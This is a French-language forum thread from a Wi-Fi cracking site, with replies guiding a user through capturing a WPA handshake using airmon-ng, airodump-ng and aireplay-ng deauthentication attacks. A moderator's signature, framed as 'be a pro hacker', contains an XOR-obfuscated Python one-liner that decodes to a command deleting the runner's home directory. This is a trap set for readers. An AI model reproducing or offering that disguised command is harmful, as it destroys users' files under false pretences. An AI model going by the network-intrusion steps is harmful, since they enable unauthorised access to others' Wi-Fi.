Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 05-05-2012 19:45:03

musta
Nouveau membre
Inscription : 24-07-2009
Messages : 8

impossible de cracker wpa

salut je recherche laide impossible de cracker wpa avec cle usb TL-WN821N 300 Mbps
je veux etre aidier
j ais fait
iwconfig
elle reconu
airodump-ng mon0
ok
airodump-ng --write nom du fichier --bssid *******  mon0
et la suite mes inpossbile d avoire crypter
a vous de me aidie

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 06-05-2012 20:51:02

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : impossible de cracker wpa

Qu'as-tu fait comme attaque ?
Il faut faire une attaque de déauthentification sur un client.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 07-05-2012 16:12:28

musta
Nouveau membre
Inscription : 24-07-2009
Messages : 8

Re : impossible de cracker wpa

merci de votre reponce j ais suiver les tuto
iwconfig
elle reconu
airodump-ng mon0
ok
airodump-ng --write nom du fichier --bssid *******  mon0
aireplay-ng -0-0 -a bssid -c station interface
aireplay-ng -0 0 -a bissid interface
et j ais rien obtenire
et vous m aver posser la question Il faut faire une attaque de déauthentification sur un client.
si vius avait fait un tuto et vous aver reussi donne le mois svp paseque je suis entrain de faire des utude sur le systeme resau securiser merci de votr

Hors Ligne

#4 07-05-2012 16:18:30

Equador
Nouveau membre
Inscription : 07-05-2012
Messages : 7

Re : impossible de cracker wpa

Quelle version de backtrack utilise tu?

Y me semble que si elle est inférieur à 4 tu dois toujours utiliser ton wlan0

Sinon, si tu utilise une carte supérieur, tu as oublié d'activer ta carte en mode "recherche" avec un airodump-ng start <nomdetacarte>

où <nomdetacarte> = wlan0 etc...

'fin, si tu n'écris que ça, mon0 n'existe pas.


développeur Labview et python.

Hors Ligne

#5 07-05-2012 19:09:36

musta
Nouveau membre
Inscription : 24-07-2009
Messages : 8

Re : impossible de cracker wpa

la version  backtrack 5 r1 5 r2 et beini-1.2.3 cle wifi tplink 54mbps tl-wn321 et tl-wn821n et dautre

Hors Ligne

#6 07-05-2012 19:12:23

musta
Nouveau membre
Inscription : 24-07-2009
Messages : 8

Re : impossible de cracker wpa

meme avec wlan0 wlan1 etc aucune resulta et il faudri que je prouve que le systeme wifi n est securiser a 100pour cent

Hors Ligne

#7 07-05-2012 19:19:12

Equador
Nouveau membre
Inscription : 07-05-2012
Messages : 7

Re : impossible de cracker wpa

Donc tu utilise backtrack 5, tu dois executer ça dans l'ordre:

airmon-ng start wlan0

là, si tu lis bien, tu auras d'affiché "monitor mode enabled on mon0) (mon0 ou mon1 ou quelque chose comme ça)

cela confirme que ta carte est opérationnelles pour l'écoute.

ensuite tu n'utiliseras PLUS wlan0 mais mon0

en d'autre mots: remplace wlan0 par mon0 pour tes prochaines actions.

Si tu essaies d'attaquer un BSSID avec un port d'écriture ça risque d'être compliqué ^^


développeur Labview et python.

Hors Ligne

#8 07-05-2012 19:32:44

musta
Nouveau membre
Inscription : 24-07-2009
Messages : 8

Re : impossible de cracker wpa

merci de tout se que vous aver dit j ais fais avec bt3 et bt4 bt5 wep c est bon mais wpa impossible d avoire le handshake.cap

Hors Ligne

#9 21-10-2012 03:41:28

jlf
Membre Indétronable
Inscription : 06-10-2012
Messages : 195

Re : impossible de cracker wpa

pour infos moi je fait toute mes attaque avec wlan1 pour le wpa et j arrive a capturé le handshake et présice le canal
airodump-ng -w NOM DU FICHIER -c DE 1 A 14 CELON LA BOX --bssid wlan1
aireplay-ng -0 0 -e MET LE NOM ESSID EXAMPLE LIVEBOX-88AA -a BSSID -c STATION wlan1
si tu capte bien tu est pas obliger de lancer l autre shell "aireplay-ng -0 0 -a bissid interface" wlan1 change celon ta config si c est une interne ou pas pour ce qui est du -e personellement j ai pas comprit a quoi il servais mais faut le mettre sinon l attaque marche pas ,si quelq un sait la raison je voudrais bien la savoir
concernant cette ligne aireplay-ng -0 0 -e MET LE NOM ESSID EXAMPLE LIVEBOX-88AA -a BSSID -c STATION wlan1 une fois lancer stop la au bout de 4 a 5 ligne voila en espérant t avoir aider sinon je suis dispo via teamwiever

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
7 323 23-11-2016 18:46:08 par koala
9 915 28-09-2016 11:33:08 par damsss
2 836 24-09-2016 19:43:09 par d4rkn0
Cracker mot de passe word par jetli-killer  [ 1 2 ]
49 1928 08-06-2016 15:33:29 par Seska
18 5349 31-05-2016 23:50:18 par Fab955

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.023 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]